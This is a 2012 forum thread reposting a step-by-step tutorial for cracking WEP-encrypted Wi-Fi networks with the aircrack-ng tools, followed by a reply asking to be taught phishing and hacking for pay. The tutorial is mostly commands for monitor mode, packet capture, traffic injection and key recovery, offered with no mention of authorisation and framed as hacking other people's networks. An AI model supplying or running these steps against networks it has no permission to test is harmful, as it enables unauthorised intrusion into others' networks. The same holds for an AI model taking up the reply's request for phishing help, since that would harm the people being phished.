Post: Hacking WIFI WEP Encryption
07-30-2012, 05:20 PM #1
Dan
I'm a god.
(adsbygoogle = window.adsbygoogle || []).push({}); I did not write this I just thought this would be a good one to share, my source will be at the bottom.

In this tutorial we will be using Kismet.

Just put in this command in a terminal to download it straight to your computer.
    sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet


WEP Cracking

1. Put your Wireless Interface into Monitor Mode:
    airmon-ng start wlan0

(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng)

You must login or register to view this content.

2. Get Info from the Available Networks:
    airodump-ng mon0


(mon0 is the monitored wlan0 interface)
You must login or register to view this content.

3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
    airodump-ng -c channel -w filetosave –bssid macaddrs mon0


(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.
You must login or register to view this content.

4. To boost the proccedure type on a new terminal:
    aireplay-ng -1 0 -a bssid mon0


(‘bssid’ is the MAC Address of the Network)
You must login or register to view this content.

5. When this command is done, capture packets by typing:
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0


(‘bssid’ is the Networks MAC Address)
You must login or register to view this content.

6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
    aircrack-ng filename.cap

(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)
You must login or register to view this content.

7. When aircrack-ng finds the key it will display something like:
    KEY FOUND! [ 12:34:56:78:90 ]

(In this example our key is ’1234567890′Winky Winky

8. When Finished, make sure you put your wireless interface back to original Mode by typing:
    airmon-ng stop wlan0


You must login or register to view this content. There is also tutorials for other types of WIFI encryption types.
(adsbygoogle = window.adsbygoogle || []).push({});

The following user thanked Dan for this useful post:

volcomstx3600
08-02-2012, 06:17 AM #2
Hello

I am Lorena defrutos, please i really want to know how to write script, email phishing and hacking. Please if you can teach i will be so glad and let me know your price. my email is [email][email protected][/email] or [email][email protected][/email]
thanks

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo